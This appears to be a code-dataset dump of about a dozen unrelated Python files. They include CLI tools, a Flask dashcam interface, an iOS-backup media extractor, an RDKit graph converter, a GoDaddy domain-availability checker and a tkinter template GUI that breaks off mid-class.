content stringlengths 5 1.05M |
|---|
# coding:utf-8
from __future__ import absolute_import, unicode_literals
import click, json
from jspider.cli.common import common_pass, common_options
__author__ = "golden"
__date__ = '2018/6/9'
@click.group(name='list')
def list_obj():
"""show something"""
pass
@list_obj.command()
@common_options
@common_pass
def projects(pub):
"""show all projects"""
data = pub.manager.list_projects()
print(json.dumps(data, sort_keys=True, indent=2, ensure_ascii=False))
@list_obj.command()
@common_options
@common_pass
def spiders(pub):
"""show all spiders"""
data = pub.manager.list_spiders()
print(json.dumps(data, sort_keys=True, indent=2, ensure_ascii=False))
|
import os
import shutil
import sqlite3
import argparse
# http://stackoverflow.com/questions/12517451/python-automatically-creating-directories-with-file-output
def copy_file_create_subdirs(src_file, dst_file):
if not os.path.exists(os.path.dirname(dst_file)):
try:
os.makedirs(os.path.dirname(dst_file))
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
# copy2 should keep metadata intact
shutil.copy2(src_file, dst_file)
def extract_media_from_backup(backup_dir, out_dir):
conn = sqlite3.connect(os.path.join(backup_dir, 'Manifest.db'))
# simple query to get only media (without thumbnails)
query = "SELECT * FROM Files WHERE domain = 'CameraRollDomain' AND relativePath LIKE '%Media/DCIM%'"
for subfile, _, relpath, _, _ in conn.cursor().execute(query):
# files are stored in subdirectories, that match first 2 characters of their names
subdir = subfile[:2]
# abspath will normalize path separators (windows uses reverse slashes, but relpath has forward ones)
# doing it on src_file is not really necessary, but won't hurt
src_file = os.path.abspath(os.path.join(backup_dir, subdir, subfile))
dst_file = os.path.abspath(os.path.join(out_dir, relpath))
try:
copy_file_create_subdirs(src_file, dst_file)
print src_file
print dst_file, '\n'
except Exception as e:
print e, '\n'
if __name__ == "__main__":
desc = "Copies media files (that were stored in 'Media/DCIM/' directory) to a " \
"specified location, retaining directory structure"
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('backup_dir', help='Location of backup directory')
parser.add_argument('out_dir', help='Destination directory, relative to which ' \
'files would be copied, according to original directory structure')
args = parser.parse_args()
extract_media_from_backup(args.backup_dir, args.out_dir)
|
import sys
import click
import random
import webcolors
from ete3 import Tree, TreeStyle, NodeStyle, TextFace
from typing import List, Dict, AnyStr, Callable
# -------------------------------------------------------------------------------
locationColours = {}
teamColours = {}
allColours = [*webcolors.CSS3_NAMES_TO_HEX]
# -------------------------------------------------------------------------------
def pick_colours():
bgColour = random.choice(allColours)
rgb = webcolors.name_to_rgb(bgColour, spec=webcolors.CSS3)
luminance = 0.2126 * rgb[0] + 0.7152 * rgb[1] + 0.0722 * rgb[2]
fgColour = "white" if (luminance < 140) else "black"
return [bgColour, fgColour]
# -------------------------------------------------------------------------------
class Employee:
setters = {
"Employee ID": lambda x, y: setattr(x, "employee_id", y),
"Name": lambda x, y: setattr(x, "name", y),
"Location": lambda x, y: setattr(x, "location", y),
"Grade": lambda x, y: setattr(x, "grade", y),
"Supervisor ID": lambda x, y: setattr(x, "supervisor", y),
"Role": lambda x, y: setattr(x, "role", y),
"Image": lambda x, y: setattr(x, "image", y),
"Top-level team": lambda x, y: setattr(x, "team", y),
"Gender": lambda x, y: setattr(x, "gender", y),
"Start Date": lambda x, y: setattr(x, "start_date", y),
"Job Title": lambda x, y: setattr(x, "job_title", y)
}
@staticmethod
def initial_attributes():
return {k: -1 for k in Employee.setters.keys()}
def __init__(self, map_: Dict, tokens_: List, colour_: Callable):
self.employee_id = ""
self.name = ""
self.grade = ""
self.supervisor = ""
self.image = ""
self.role = ""
self.location = ""
self.team = ""
self.gender = ""
self.job_title = ""
self.reports = []
for k, v in filter(lambda x: x[1] != -1, map_.items()):
Employee.setters[k](self, tokens_[v])
self.colours = colour_(self)
def __str__(self):
return "id: {}\n name: {}\n grade: {}\n supervisor: {}\n immge: {}\n role: {}\n location: {}\n team: {}" \
+ "\n gender: {}\n job title: {}\n [{}]".format(
self.employee_id,
self.name,
self.grade,
self.supervisor,
self.image,
self.role,
self.location,
self.team,
self.gender,
self.job_title,
", ".join(self.reports))
# -------------------------------------------------------------------------------
def colour_by_team(employee_: Employee):
return teamColours.setdefault(employee_.team, pick_colours())
def colour_by_role(employee_: Employee):
return teamColours.setdefault(employee_.role, pick_colours())
def colour_by_gender(employee_: Employee):
return teamColours.setdefault(employee_.gender, pick_colours())
def colour_by_location(employee_: Employee):
return teamColours.setdefault(employee_.location, pick_colours())
def colour_by_grade(employee_: Employee):
return teamColours.setdefault(employee_.grade, pick_colours())
def colour_by_jon_title(employee_: Employee):
return teamColours.setdefault(employee_.job_title, pick_colours())
def colour_by_none(_):
return ["White", "Black"]
# -------------------------------------------------------------------------------
def ete_graph(employee_: AnyStr, employees_: Dict, manager_=None):
employee = employees_[employee_]
employee_node = manager_.add_child(name=employee.name, dist=1) if manager_ else Tree(name=employee.name)
node_style = NodeStyle()
node_style["shape"] = "sphere"
node_style["size"] = 40 if employee.role else 20
node_style["fgcolor"] = locationColours.setdefault(employees_[employee_].location, random.choice(allColours))
employee_node.set_style(node_style)
def text_face(name_, colour_, fsize_=30):
face = TextFace(name_, tight_text=False, fsize=fsize_)
face.margin_right = 5
face.margin_left = 5
face.background.color = colour_[0]
face.fgcolor = colour_[1]
return face
position = "branch-right"
employee_node.add_face(text_face(employee.name, employee.colours), column=0, position=position)
if employee.role:
employee_node.add_face(text_face(employee.role, employee.colours, 20), column=0, position=position)
for report in employees_[employee_].reports:
ete_graph(report, employees_, employee_node)
if not manager_:
return employee_node
# -------------------------------------------------------------------------------
def tree_style():
ts = TreeStyle()
ts.show_leaf_name = False # we're manually adding text faces
ts.mode = "c"
ts.show_scale = False
ts.scale = None
ts.optimal_scale_level = "full"
ts.force_topology = True
return ts
# -------------------------------------------------------------------------------
def handle_colour_by(_, __, value: AnyStr):
if value == "role":
return colour_by_role
elif value == "location":
return colour_by_location
elif value == "grade":
return colour_by_grade
elif value == "gender":
return colour_by_gender
elif value == "team":
return colour_by_team
elif value == "title":
return colour_by_jon_title
elif value == "none":
return colour_by_none
# -------------------------------------------------------------------------------
@click.command()
@click.argument("data", type=click.File("r"))
@click.option("-r", "--root", default=None, help="Person to use as the top of the chart")
@click.option("-f", "--file", default="org-chart.png", help="output file")
@click.option("-c", "--colour-by", type=click.Choice(["role", "location", "grade", "gender", "team", "none", "title"]),
default="none", callback=handle_colour_by)
def cli(data, root, file, colour_by):
employees = []
def normalise(str_):
return str_.rstrip("\n")
attributes = Employee.initial_attributes()
headers = list(map(normalise, data.readline().split(',')))
for i, token in enumerate(headers):
attributes[token] = i
for line in data.readlines()[:]:
tokens = list(map(normalise, line.split(',')))
employees.append(Employee(attributes, tokens, colour_by))
employees_by_id = {k.employee_id: k for k in employees}
name_to_id = {k.name: k.employee_id for k in employees}
# TODO Don't take two passes to do this
for employee in employees:
try:
employees_by_id[employee.supervisor].reports.append(employee.employee_id)
except KeyError:
pass
if employee.supervisor == "" and not root:
root = employee.name
try:
employee_id = name_to_id[root]
except KeyError:
sys.stderr.write(root + " Does not exist in csv file\n")
sys.exit(1)
tree = ete_graph(employee_id, employees_by_id)
tree.render(file, tree_style=tree_style())
# -------------------------------------------------------------------------------
if __name__ == "__main__":
cli()
|
from math import ceil
from operator import attrgetter
import time
from flask import Flask, Response, abort, render_template, redirect, request, \
url_for
from flask_bootstrap import Bootstrap
from . import Mode, YIDashcam, YIDashcamException, \
YIDashcamConnectionException, YIDashcamFileException
from .config import option_map
app = Flask(__name__.split(".")[0])
Bootstrap(app)
app.config['BOOTSTRAP_SERVE_LOCAL'] = True
yi = None
class Pagination():
"""Derived from http://flask.pocoo.org/snippets/44/"""
def __init__(self, page, per_page, total_count):
self.page = page
self.per_page = per_page
self.total_count = total_count
if page < 1 or page > self.pages:
raise ValueError("Invalid page number")
@property
def pages(self):
return ceil(self.total_count / self.per_page) or 1
@property
def has_prev(self):
return self.page > 1
@property
def has_next(self):
return self.page < self.pages
@property
def first_item_index(self):
return (self.page - 1) * self.per_page
@property
def last_item_index(self):
if self.page == self.pages:
return self.total_count
else:
return self.page * self.per_page
def page_items(self, items):
"""Return list of items on current page from `items`"""
return items[self.first_item_index:self.last_item_index]
def url_for_other_page(page):
"""http://flask.pocoo.org/snippets/44/"""
args = request.view_args.copy()
args['page'] = page
return url_for(request.endpoint, **args)
app.jinja_env.globals['url_for_other_page'] = url_for_other_page
def get_yi():
global yi
if yi is None:
yi = YIDashcam(Mode.file)
elif not yi.connected:
yi.connect(mode=Mode.file)
elif yi.mode != Mode.file:
yi.set_mode(Mode.file)
return yi
@app.errorhandler(404)
def error_404_handler(error):
return render_template("error.html", message=error), 404
@app.errorhandler(500)
def error_500_handler(error):
return render_template("error.html", message=error), 500
@app.errorhandler(YIDashcamException)
def yi_handler(error):
return render_template(
"error.html", message="Error Interfacing With YI Dashcam"), 500
@app.errorhandler(YIDashcamConnectionException)
def yi_connection_handler(error):
return render_template(
"error.html", message="Failed To Connect To YI Dashcam"), 500
@app.errorhandler(YIDashcamFileException)
def yi_file_handler(error):
return render_template(
"error.html", message="File Not Found On YI Dashcam"), 404
@app.context_processor
def yi_context():
context = {}
if yi is not None and yi.connected:
context['serial_number'] = yi.serial_number
context['firmware_version'] = yi.firmware_version
return context
@app.route('/')
def index():
return redirect(url_for('file_list_page', file_type="emergency"))
@app.route('/<file_type>/', defaults={'page': 1})
@app.route('/<file_type>/<int:page>')
def file_list_page(file_type, page):
try:
file_list = getattr(get_yi(), '{}_list'.format(file_type))
except AttributeError:
abort(404)
file_list_len = len(file_list) if file_list is not None else 1
try:
pagination = Pagination(page, 20, file_list_len)
except ValueError:
# Bad page number
abort(404)
file_list.sort(key=attrgetter('time'), reverse=True)
page_file_list = pagination.page_items(file_list)
return render_template(
'file_list.html',
file_type=file_type,
file_list=page_file_list,
file_dates={file_.time.date() for file_ in page_file_list},
pagination=pagination)
@app.route('/thumbnail/<path:path>')
def thumbnail(path):
"""Fetch thumbnail, and ask browser to cache for a week"""
return Response(
get_yi().get_thumbnail(path),
headers={'Cache-Control': "max-age=604800"},
mimetype='image/jpeg')
@app.route('/delete/<path:path>', methods=["POST"])
def delete(path):
"""Delete file from dashcam"""
path = "A:\\{}".format(path.replace('/', '\\'))
get_yi().delete_file(path, force=True)
return redirect(request.form.get("next", request.referrer), code=303)
@app.route('/settings', methods=["GET", "POST"])
def settings():
"""Page to interact with dashcam config"""
if request.method == "POST":
yi = get_yi()
for option, cur_value in yi.config.items():
new_value = request.form.get(option.name, None)
if new_value is not None and int(new_value) != cur_value:
yi.set_config(option, int(new_value))
yi.set_mode(Mode.file)
time.sleep(0.5) # Allow settings to settle in
return redirect(url_for('settings'), code=303)
else:
return render_template(
'settings.html', settings=get_yi().config, option_map=option_map)
|
from ..abstract_manifest import AbstractManifest
from bitmovin.resources.enums.hls_version import HlsVersion
class HlsManifest(AbstractManifest):
def __init__(self, manifest_name, outputs, name=None, description=None, id_=None, custom_data=None,
hls_media_playlist_version=None, hls_master_playlist_version=None):
super().__init__(id_=id_, custom_data=custom_data, manifest_name=manifest_name, outputs=outputs,
name=name, description=description)
self._hlsMediaPlaylistVersion = None
self.hlsMediaPlaylistVersion = hls_media_playlist_version
self._hlsMasterPlaylistVersion = None
self.hlsMasterPlaylistVersion = hls_master_playlist_version
@property
def hlsMediaPlaylistVersion(self):
return self._hlsMediaPlaylistVersion
@hlsMediaPlaylistVersion.setter
def hlsMediaPlaylistVersion(self, new_hls_media_playlist_version):
if new_hls_media_playlist_version is None:
self._hlsMediaPlaylistVersion = None
elif isinstance(new_hls_media_playlist_version, HlsVersion):
self._hlsMediaPlaylistVersion = new_hls_media_playlist_version.value
elif isinstance(new_hls_media_playlist_version, int):
self._hlsMediaPlaylistVersion = new_hls_media_playlist_version
else:
raise InvalidTypeError('hlsMediaPlaylistVersion has to be of type HlsVersion')
@property
def hlsMasterPlaylistVersion(self):
return self._hlsMasterPlaylistVersion
@hlsMasterPlaylistVersion.setter
def hlsMasterPlaylistVersion(self, new_hls_master_playlist_version):
if new_hls_master_playlist_version is None:
self._hlsMasterPlaylistVersion = None
elif isinstance(new_hls_master_playlist_version, HlsVersion):
self._hlsMasterPlaylistVersion = new_hls_master_playlist_version.value
elif isinstance(new_hls_master_playlist_version, int):
self._hlsMasterPlaylistVersion = new_hls_master_playlist_version
else:
raise InvalidTypeError('hlsMasterPlaylistVersion has to be of type HlsVersion')
@classmethod
def parse_from_json_object(cls, json_object):
manifest = AbstractManifest.parse_from_json_object(json_object=json_object)
id_ = manifest.id
manifest_name = manifest.manifestName
name = manifest.name
description = manifest.description
custom_data = manifest.customData
outputs = manifest.outputs
hls_media_playlist_version = json_object.get('hlsMediaPlaylistVersion')
hls_master_playlist_version = json_object.get('hlsMasterPlaylistVersion')
hls_manifest = HlsManifest(id_=id_, manifest_name=manifest_name, custom_data=custom_data,
outputs=outputs, name=name, description=description,
hls_media_playlist_version=hls_media_playlist_version,
hls_master_playlist_version=hls_master_playlist_version)
return hls_manifest
def serialize(self):
serialized = super().serialize()
serialized['hlsMediaPlaylistVersion'] = self.hlsMediaPlaylistVersion
serialized['hlsMasterPlaylistVersion'] = self.hlsMasterPlaylistVersion
return serialized
|
import asyncio
import click
from pyrobot.rgb_leds import RgbUnderlighting, HsvColor
@click.group()
@click.pass_context
def cli(ctx):
ctx.ensure_object(dict)
@cli.command()
@click.pass_context
@click.option('-h', 'h', default=255, show_default=True)
@click.option('-s', 's', default=255, show_default=True)
@click.option('-v', 'v', default=255, show_default=True)
def all(ctx, h, s, v):
underligts = ctx.obj['lights']
underligts.set_color(HsvColor(h, s, v))
@cli.command()
@click.pass_context
@click.option('-h', 'hue', default=0, show_default=True)
@click.option('-s', 'saturation', default=0, show_default=True)
def flash(ctx, hue, saturation):
underligts = ctx.obj['lights']
async def main():
await underligts.flash(hue, saturation)
asyncio.run(main())
@cli.command()
@click.pass_context
@click.option('-h', 'h', default=255, show_default=True)
@click.option('-s', 's', default=255, show_default=True)
@click.option('-v', 'v', default=255, show_default=True)
@click.argument('pattern')
def set(ctx, h, s, v, pattern):
underligts = ctx.obj['lights']
print(pattern)
underligts.change_color(HsvColor(h, s, v), pattern)
@cli.command()
@click.pass_context
def off(ctx):
underligts = ctx.obj['lights']
underligts.turn_off()
if __name__ == '__main__':
cli(obj={'lights': RgbUnderlighting()})
|
from abc import abstractmethod
class Metric:
def on_epoch_starts(self, *args, **kwargs):
pass
def on_epoch_ends(self, *args, **kwargs):
pass
def on_task_starts(self, *args, **kwargs):
pass
def on_task_ends(self, *args, **kwargs):
pass
def on_batch_starts(self, *args, **kwargs):
pass
def on_batch_ends(self, *args, **kwargs):
pass
# def after_optimization_step(self, *args, **kwargs):
# pass
#
# def after_back_propagation(self, *args, **kwargs):
# pass
#
# def before_gradient_calculation(self, *args, **kwargs):
# pass
def __call__(self, *arg, **kwargs) -> int:
pass
class ContinualLearningMetric(Metric):
def __init__(self):
super(ContinualLearningMetric, self).__init__()
@abstractmethod
def __call__(self, *args, **kwargs) -> int:
raise NotImplementedError
class ClassificationMetric(Metric):
def __init__(self):
super(ClassificationMetric, self).__init__()
@abstractmethod
def __call__(self, y_true, y_pred, *args, **kwargs) -> int:
raise NotImplementedError
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2018 Abdelkrime Aries <kariminfo0@gmail.com>
#
# ---- AUTHORS ----
# 2018 Abdelkrime Aries <kariminfo0@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import numpy
import tensorflow as tf
from modeling.seq_autoencoder import SeqAutoEncoder
from reading import reader
dataset_url = "/home/kariminf/Data/ATS/Mss15Train/stats/"
batch = {}
for f in os.listdir(dataset_url):
lang_url = os.path.join(dataset_url, f)
if os.path.isdir(lang_url):
print "reading ", f
doc_sim_seq = reader.get_doc_sim_lang(lang_url)
batch[f] = doc_sim_seq
#Inputs holders
doc_sim_seq_ = tf.placeholder(tf.float32, shape=[None,None,1], name="doc_sim_seq_in")
model = SeqAutoEncoder("doc_sim", doc_sim_seq_)
latent = model.get_latent()
output = model.get_graph()
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
for i in range(100):
for lang in batch:
doc_sim_seq = batch[lang]
print i, lang, numpy.shape(doc_sim_seq)
#_, cst, o = sess.run([train_step, cost, out], feed_dict={x: X, r: R})
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import json
import logging
import traceback
import tornado.ioloop
from tornado import gen
from tornado.httpclient import AsyncHTTPClient
from data.models import LastDomain, Domain
from data.session_mysql import SessionCM
__author__ = 'f0x11'
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) '
'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36',
}
# chars = '0123456789'
chars = 'abcdefghijklmnopqrstuvwxyz'
# chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'
total = 0
def init_domain_info(domain):
domain_info = []
for c in domain:
idx = chars.index(c)
if idx < 0:
logging.warning("domain error, domain=%s" % domain)
raise Exception('domain error')
domain_info.append(idx)
return domain_info
def gen_domain_list(start_domain="00000"):
"""
从前开始变化
:param start_domain:
"""
domain_len = len(start_domain)
total_len = len(chars)
# domain_info = [0] * domain_len
domain_info = init_domain_info(start_domain)
def gen_domain(i):
if i >= domain_len:
return False
domain_info[i] += 1
if domain_info[i] >= total_len:
domain_info[i] = 0
return gen_domain(i + 1)
return True
while True:
global total
total += 1
yield ''.join([chars[d] for d in domain_info])
con = gen_domain(0)
if not con:
break
@gen.coroutine
def capture_domain(domain):
try:
http_client = AsyncHTTPClient()
response = yield http_client.fetch(
'https://www.godaddy.com/domainsapi/v1/search/exact?q={0}.com'.format(domain),
headers=headers)
except:
logging.error(traceback.format_exc())
return
if response.error:
logging.error("Error: %s", response.error)
return
if not response.body:
logging.error("Error: body is null, domain=%s", domain)
return
content = json.loads(response.body.decode())
is_available = content['ExactMatchDomain']['IsAvailable']
with SessionCM() as db_session:
if is_available:
new_domain = Domain(content=domain)
db_session.add(new_domain)
db_session.commit()
db_session.query(LastDomain).update({'content': domain})
db_session.commit()
@gen.coroutine
def capture_domains():
with SessionCM() as db_session:
last_domain_item = db_session.query(LastDomain).first()
if last_domain_item:
start_domain = last_domain_item.content
else:
start_domain = chars[0] * 5
for domain in gen_domain_list(start_domain):
yield capture_domain(domain)
yield gen.sleep(1)
tornado.ioloop.IOLoop.instance().stop()
if __name__ == '__main__':
# for i in gen_domain_list('11'):
# print(i)
capture_domains()
tornado.ioloop.IOLoop.instance().start()
|
# flake8: noqa
from chat.server.core import Server, WebServer
from chat.server.requests import Request, ServerRequest
server: Server = WebServer()
from . import routes
|
'''
interface between networkx graphs and the world of chemistry via rdkit
functionality:
# gernerating networkx graphs:
sdf_to_nx(file.sdf)
smi_to_nx(file.smi)
smiles_to_nx(smilesstringlist)
# graph out:
draw(nx)
nx_to_smi(graphlist, path_to_file.smi)
#bonus: garden style transformer.
class MoleculeToGraph
'''
from sklearn.base import BaseEstimator, TransformerMixin
from rdkit import Chem
from rdkit.Chem import AllChem
from rdkit.Chem import Draw
import networkx as nx
import logging
logger = logging.getLogger(__name__)
class MoleculeToGraph(BaseEstimator, TransformerMixin):
def __init__(self, file_format='sdf'):
"""Constructor.
valid 'file_format' strings and what the transformer will expect
smi: path to .smi file
sdf: pat to .sdf file
"""
self.file_format = file_format
def transform(self, data):
"""Transform."""
try:
if self.file_format == 'smi':
graphs = smi_to_nx(data)
elif self.file_format == 'sdf':
graphs = sdf_to_nx(data)
else:
raise Exception('file_format must be smi or sdf')
for graph in graphs:
yield graph
except Exception as e:
logger.debug('Failed iteration. Reason: %s' % e)
logger.debug('Exception', exc_info=True)
################
# import to networkx graphs
###############
def sdf_to_nx(file):
# read sdf file
suppl = Chem.SDMolSupplier(file)
for mol in suppl:
yield rdkmol_to_nx(mol)
def smi_to_nx(file):
# read smi file
suppl = Chem.SmilesMolSupplier(file)
for mol in suppl:
yield rdkmol_to_nx(mol)
def rdkmol_to_nx(mol):
# rdkit-mol object to nx.graph
graph = nx.Graph()
for e in mol.GetAtoms():
graph.add_node(e.GetIdx(), label=e.GetSymbol())
for b in mol.GetBonds():
graph.add_edge(b.GetBeginAtomIdx(), b.GetEndAtomIdx(), label=str(int(b.GetBondTypeAsDouble())))
return graph
def smiles_strings_to_nx(smileslist):
# smiles strings
for smile in smileslist:
mol = Chem.MolFromSmiles(smile)
yield rdkmol_to_nx(mol)
################
# exporting networkx graphs
###############
def nx_to_smi(graphs, file):
# writes smiles strings to a file
chem = [nx_to_rdkit(graph) for graph in graphs]
smis = [Chem.MolToSmiles(m) for m in chem]
with open(file, 'w') as f:
f.write('\n'.join(smis))
def nx_to_rdkit(graph):
m = Chem.MolFromSmiles('')
mw = Chem.RWMol(m)
atom_index = {}
for n, d in graph.nodes(data=True):
atom_index[n] = mw.AddAtom(Chem.Atom(d['label']))
for a, b, d in graph.edges(data=True):
start = atom_index[a]
end = atom_index[b]
bond_type = d.get("label", '1')
if bond_type == '1':
mw.AddBond(start, end, Chem.BondType.SINGLE)
elif bond_type == '2':
mw.AddBond(start, end, Chem.BondType.DOUBLE)
elif bond_type == '3':
mw.AddBond(start, end, Chem.BondType.TRIPLE)
# more options:
# http://www.rdkit.org/Python_Docs/rdkit.Chem.rdchem.BondType-class.html
else:
raise Exception('bond type not implemented')
mol = mw.GetMol()
return mol
###########################
# output
###########################
def set_coordinates(chemlist):
for m in chemlist:
if m:
# updateprops fixes "RuntimeError: Pre-condition Violation"
m.UpdatePropertyCache(strict=False)
AllChem.Compute2DCoords(m)
else:
raise Exception('''set coordinates failed..''')
def get_smiles_strings(graphs):
compounds = map(nx_to_rdkit, graphs)
return map(Chem.MolToSmiles, compounds)
def nx_to_image(graphs, n_graphs_per_line=5, size=250, title_key=None, titles=None):
# we want a list of graphs
if isinstance(graphs, nx.Graph):
raise Exception("give me a list of graphs")
# make molecule objects
compounds = map(nx_to_rdkit, graphs)
# print compounds
# take care of the subtitle of each graph
if title_key:
legend = [g.graph.get(title_key, 'N/A') for g in graphs]
elif titles:
legend = titles
else:
legend = map(str, range(len(graphs)))
return compounds_to_image(compounds, n_graphs_per_line=n_graphs_per_line, size=size, legend=legend)
def compounds_to_image(compounds, n_graphs_per_line=5, size=250, legend=None):
# calculate coordinates:
set_coordinates(compounds)
# make the image
return Draw.MolsToGridImage(compounds, molsPerRow=n_graphs_per_line, subImgSize=(size, size), legends=legend)
|
"""
LED_Analyze - gui_input_template
Date: 15 June 2018
By: Ivan Pougatchev
Version: 1.0
"""
from tkinter import *
from tkinter import messagebox
from copy import deepcopy
from gui_common import *
from analysis_main import InputTemplate, ExtractVal, ExtractRange
class TemplateScrFrame(SelectableScrFrame):
"""
Scrolling frame to be placed within InputTemplateFrame. Display
template data currently contained within data_ref container where
data_ref is the list of uncommitted input templates.
"""
def __init__(self, master, data_ref):
header = (("", 35),
("Input Name",90),
("File Type", 75),
("Delimiter", 75),
("Suffix", 75),
("Outputs", 100))
SelectableScrFrame.__init__(self, master, data_ref, header, 125)
def update_data(self, start=0):
# Update data contained in the data_lines container with the current
# data in the data_ref container
new_data_lines = []
# Extract data from each template to generate label text
for template in self.data_ref[start:]:
new_line = []
new_line.append(template.name)
new_line.append(template.file_type)
new_line.append(template.delim)
new_line.append(template.suffix)
# Extract just the names of the values/ranges
ext_names = []
for ext_single in template.vals:
ext_names.append(ext_single.name)
ext_names.append("\n")
for ext_range in template.ranges:
ext_names.append(ext_range.name)
ext_names.append("\n")
name_str = "".join(ext_names)[:-1]
new_line.append(name_str)
new_data_lines.append(new_line)
del self.data_lines[start:]
self.data_lines.extend(new_data_lines)
def add_line(self):
gui = AddTemplateGUI(self.data_ref, self, None)
gui.lift(self.master)
def edit_line(self, i):
if len(self.data_ref) != 0:
gui = AddTemplateGUI(self.data_ref, self, i)
gui.lift(self.master)
def remove_line(self, i):
if len(self.data_ref) != 0:
del self.data_ref[i]
self.update_data(i)
self.reconcile_lines(i)
class SingleScrFrame(SelectableScrFrame):
"""
Scrolling frame to be placed within an instance of InputTemplateGUI.
Display info for single value extractions currently contained
within data_ref container where data_ref is uncommitted data for a
single input template.
"""
def __init__(self, master, data_ref, file_type):
header = (("", 35),
("Value Name",100),
("Line", 60),
("Sheet", 40),
("Rule/Source", 180))
SelectableScrFrame.__init__(self, master, data_ref, header, 150)
self.file_type = file_type
def update_data(self):
# Update data contained in the data_lines container with the current
# data in the templates_uncomm container
self.data_lines = []
for val in self.data_ref.vals:
new_line = []
new_line.append(val.name)
new_line.append(val.line)
new_line.append(val.sheet)
new_line.append(val.rule)
self.data_lines.append(new_line)
def add_line(self):
gui = AddSingleValueGUI(self.data_ref, self, self.file_type, None)
gui.lift(self.master)
def edit_line(self, i):
if len(self.data_ref.vals) != 0:
AddSingleValueGUI(self.data_ref, self, self.file_type, i)
def remove_line(self, i):
if len(self.data_ref.vals) != 0:
del self.data_ref.vals[i]
self.update_data()
self.reconcile_lines(i)
class RangeScrFrame(SelectableScrFrame):
"""
Scrolling frame to be placed within an instance of InputTemplateGUI.
Display info for range extractions currently contained within data_ref
container where data_ref is uncommitted data for a single input
template.
"""
def __init__(self, master, data_ref, file_type):
header = (("", 35),
("Range Name", 150),
("Sheet", 50),
("Rule/Source", 180))
SelectableScrFrame.__init__(self, master, data_ref, header, 150)
self.file_type = file_type
def update_data(self):
# Update data contained in the data_lines container with the current
# data in the templates_uncomm container
self.data_lines = []
for rng in self.data_ref.ranges:
new_line = []
new_line.append(rng.name)
new_line.append(rng.sheet)
new_line.append(rng.rule)
self.data_lines.append(new_line)
def add_line(self):
AddRangeGUI(self.data_ref, self, self.file_type, None)
def edit_line(self, i):
if len(self.data_ref.ranges) != 0:
AddRangeGUI(self.data_ref, self, self.file_type, i)
def remove_line(self, i):
if len(self.data_ref.ranges) != 0:
del self.data_ref.ranges[i]
self.update_data()
self.reconcile_lines(i)
class InputTemplateFrame(LabelFrame):
"""
Frame to be placed on the main GUI screen containing the
SelectableScrFrame displaying current input templates
"""
def __init__(self, master, data_ref, commit_flag):
LabelFrame.__init__(self, master)
# Initialize attributes
self.data_ref = data_ref # Ref to current committed templates
self.data_uncomm = deepcopy(data_ref)
self.commit_flag = commit_flag
# Configure frame
self.config(text = "Input Template")
self.columnconfigure(0, minsize=5)
for i in range(1, 5):
self.columnconfigure(i, minsize=100)
self.columnconfigure(5, minsize=5)
# Create TemplateScrFrame
self.scrframe = TemplateScrFrame(self, self.data_uncomm)
self.scrframe.grid(
row=1, column=1, columnspan=4, pady=2)
# Create buttons
button_data = (
("Add Template", self.scrframe.add_line, 0, 1),
("Edit",
lambda: self.scrframe.edit_line(self.scrframe.sel_line.get()),
0, 3),
("Remove",
lambda: self.scrframe.remove_line(self.scrframe.sel_line.get()),
0, 4),
("Commit", self.commit, 2, 3),
("Un-Commit", self.ask_uncommit, 2, 4)
)
self.buttons = []
for i, (name, call, r, c) in enumerate(button_data):
self.buttons.append(
Button(self,
text=name,
width=15,
command=call)
)
self.buttons[i].grid(row=r, column=c, pady=5)
self.buttons[4].config(state=DISABLED)
def ask_uncommit(self):
result = messagebox.askokcancel(
"Confirm Un-Commit",
"Are you sure you want to un-commit the input " +
"template data? Doing so will clear out all " +
"other analysis data.",
parent=self)
if result:
self.uncommit()
def commit(self):
data_comm = deepcopy(self.data_uncomm)
self.data_ref.clear()
self.data_ref.extend(data_comm)
self.commit_flag.set(True)
def uncommit(self):
self.data_uncomm.clear()
for template in self.data_ref:
copy_temp = deepcopy(template)
self.data_uncomm.append(copy_temp)
self.commit_flag.set(False)
def soft_commit(self):
data_comm = deepcopy(self.data_uncomm)
self.data_ref.clear()
self.data_ref.extend(data_comm)
class TemplateExtractFrame(LabelFrame):
def __init__(self, master, data_ref, label, file_type):
LabelFrame.__init__(self, master)
self.config(text=label)
# Initialize attributes
self.master = master
self.data_ref = data_ref # Ref to the uncommitted template data
# Create Frame
if label == "Extract Single Value":
self.scrframe = SingleScrFrame(self, self.data_ref, file_type)
elif label == "Extract Range":
self.scrframe = RangeScrFrame(self, self.data_ref, file_type)
self.scrframe.grid(
row=2, column=1, columnspan=4)
self.rowconfigure(0, minsize=2)
self.columnconfigure(0, minsize=5)
for i in range(1, 5):
self.columnconfigure(i, minsize=100)
self.columnconfigure(5, minsize=5)
self.rowconfigure(3, minsize=5)
# Create buttons
button_data = (
("Add", self.scrframe.add_line, 1, 1),
("Edit",
lambda: self.scrframe.edit_line(self.scrframe.sel_line.get()),
1, 3),
("Remove",
lambda: self.scrframe.remove_line(self.scrframe.sel_line.get()),
1, 4)
)
self.buttons = []
for i, (name, call, r, c) in enumerate(button_data):
self.buttons.append(
Button(self,
text=name,
width=13,
command=call)
)
self.buttons[i].grid(row=r, column=c, pady=5)
class AddTemplateGUI(Toplevel):
"""
GUI pop up window that allows the user to define an input file template
including:
* Template name
* Template file type (delimited text or excel)
* Template filename suffix
* Output data to be extracted (name and rule)
"""
def __init__(self, data_ref, display, i=None):
# Create and configure base window
Toplevel.__init__(self)
self.title("Define Input Data Template - CSV Analyzer")
self.resizable(False, False)
self.rowconfigure(0, minsize=5)
self.columnconfigure(0, minsize=5)
self.columnconfigure(3, minsize=5)
# Initialize attributes
self.data_ref = data_ref # Ref to the list of uncommitted templates
self.display = display # Ref to the display frame that called this GUI
self.i = i
